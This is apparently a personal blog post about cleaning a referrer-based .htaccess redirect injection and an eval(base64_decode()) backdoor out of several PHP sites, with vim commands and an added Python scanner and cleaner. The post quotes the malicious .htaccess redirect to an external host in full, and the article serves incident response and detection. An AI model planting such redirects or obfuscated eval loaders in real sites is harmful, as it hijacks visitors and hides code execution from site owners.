PHP/.htaccess Hacks

Today, I got an email from not a client, but a user of a client’s site telling me something was wrong.

Hearing that isn’t good.

So I combed through the code to see what it could be and found the problem. It seemed the following code was being placed into the .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4&parameter=sf [R,L]

…and this code within index.php files:

<?php eval(base64_decode("JGw9**bla bla bla bla**")); ?>

That was nasty. Fortunately, it only broke the one site I was contacted about. At first I thought my FTP account had been compromised. However, I found that someone else was having the same problem at the same time (or at least 10 or so hours earlier). His post helped me stop blaming myself and see the situation as a whole.

After I finished fixing the one site and reading that blog post, I started combing through the other directories. Here’s what I noticed:

  • In each directory, the index.php and .htaccess were infected with this code. To check whether other files had been altered as well, I sorted the file listing in my FTP program by its modified date, as shown below:
    (Screenshot: Checking to see which files have been affected.)
  • All of the affected sites in my /domains directory had either Horde, WordPress, Drupal, or Modx installed, and that included installations that did not have a public URL.
  • I used the following search and replace commands in vim to help out:
    For index.php:

    %s/eval(base64_decode("JGw9**bla-bla-bla-bla**"));//g

    For .htaccess:

    .,$s/.*//g

    Warning: This blanks every line from the one it is run on to the end of the file! I could not find a suitable way to match the malicious block in a search and replace (it was late), so instead I moved to the first line of the injected code and ran the command from there.
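The .htaccess block above only fires when the HTTP_REFERER shows the visitor arrived from a search engine, which is why the owner loading the site directly sees nothing while searchers get bounced to the attacker's in.cgi script; the index.php one-liner hides its payload behind base64 so a plain-text grep for suspicious PHP misses it. As an added example that is not the post's own commands, the script below does the clean-up in a repeatable way: it walks a web root, flags index.php files carrying an eval(base64_decode(...)) one-liner and .htaccess files carrying the referrer-based redirect block, lists the hits newest-modified first (the FTP sort from the post), and strips the injections while keeping a .bak copy. The two-site tree it builds in a temporary directory is constructed, the redirect host `redirect.invalid` is a placeholder, and the base64 blob in the sample decodes to harmless text.

```python
"""Added example: locate and strip the two injections described in the post.
Sample files are constructed here; nothing below comes from the real site."""
import re
import tempfile
from pathlib import Path

# Pattern 1: the index.php payload, a one-line eval() of a base64 blob. The
# blob is matched generically because the post only showed its first bytes.
PHP_EVAL_RE = re.compile(
    r'<\?php\s+eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);\s*\?>\s*'
)

# Pattern 2: the .htaccess block, i.e. referrer checks followed by a RewriteRule
# that redirects everything to an external host. "RewriteEngine On" is left
# alone on purpose: WordPress and Drupal rely on it for their own rules.
HTACCESS_BLOCK_RE = re.compile(
    r'(?:RewriteOptions inherit\s*\n)?'
    r'(?:RewriteCond %\{HTTP_REFERER\} \S+ \[NC(?:,OR)?\]\s*\n)+'
    r'RewriteRule \.\* https?://\S+ \[R,L\]\s*\n?'
)


def clean_php(text):
    """Return (text without eval(base64_decode()) one-liners, number removed)."""
    return PHP_EVAL_RE.subn('', text)


def clean_htaccess(text):
    """Return (text without the referrer-redirect block, number removed)."""
    return HTACCESS_BLOCK_RE.subn('', text)


CLEANERS = {'index.php': clean_php, '.htaccess': clean_htaccess}


def scan_tree(root):
    """List infected files as (path, hit count), newest modification first."""
    hits = []
    for path in Path(root).rglob('*'):
        cleaner = CLEANERS.get(path.name)
        if cleaner is None or not path.is_file():
            continue
        _, count = cleaner(path.read_text(encoding='utf-8', errors='replace'))
        if count:
            hits.append((path, count))
    hits.sort(key=lambda hit: hit[0].stat().st_mtime, reverse=True)
    return hits


def disinfect(root):
    """Strip the injections in place, keep a .bak copy, return files changed."""
    changed = 0
    for path, _ in scan_tree(root):
        original = path.read_text(encoding='utf-8', errors='replace')
        cleaned, _ = CLEANERS[path.name](original)
        path.with_suffix(path.suffix + '.bak').write_text(original, encoding='utf-8')
        path.write_text(cleaned, encoding='utf-8')
        changed += 1
    return changed


# Constructed sample content. The base64 decodes to "$l=constructed_sample".
INJECTED_PHP = '<?php eval(base64_decode("JGw9Y29uc3RydWN0ZWRfc2FtcGxl")); ?>\n'
INJECTED_HTACCESS = (
    'RewriteEngine On\nRewriteOptions inherit\n'
    'RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]\n'
    'RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]\n'
    'RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]\n'
    'RewriteRule .* http://redirect.invalid/in.cgi?4&parameter=sf [R,L]\n'
)
CLEAN_PHP = "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n"
CLEAN_HTACCESS = (
    '# BEGIN WordPress\nRewriteEngine On\nRewriteBase /\n'
    'RewriteRule ^index\\.php$ - [L]\n# END WordPress\n'
)


def build_sample_site(root):
    """Two constructed sites under root: 'blog' is infected, 'static' is not."""
    (root / 'blog').mkdir(parents=True)
    (root / 'blog' / 'index.php').write_text(INJECTED_PHP + CLEAN_PHP, encoding='utf-8')
    (root / 'blog' / '.htaccess').write_text(INJECTED_HTACCESS + CLEAN_HTACCESS, encoding='utf-8')
    (root / 'static').mkdir()
    (root / 'static' / 'index.php').write_text(CLEAN_PHP, encoding='utf-8')
    (root / 'static' / '.htaccess').write_text(CLEAN_HTACCESS, encoding='utf-8')


def demo():
    """Build the sample tree, scan, disinfect, and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_site(root)
        infected = sorted(p.relative_to(root).as_posix() for p, _ in scan_tree(root))
        changed = disinfect(root)
        return {
            'infected': infected,
            'changed': changed,
            'remaining': len(scan_tree(root)),
            'php_ok': (root / 'blog' / 'index.php').read_text(encoding='utf-8') == CLEAN_PHP,
            'htaccess_ok': (root / 'blog' / '.htaccess').read_text(encoding='utf-8')
            == 'RewriteEngine On\n' + CLEAN_HTACCESS,
        }


if __name__ == '__main__':
    for key, value in demo().items():
        print(f'{key}: {value}')
```

Run it against a real web root by replacing the temporary directory with the path to /domains; review the scan output before calling disinfect, and keep the .bak files until the site has been checked, since the regexes only cover the two exact shapes seen in this incident and a variant would need its pattern added.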

That’s enough for now. Some kids my age go out and party. I just fix security issues that arise.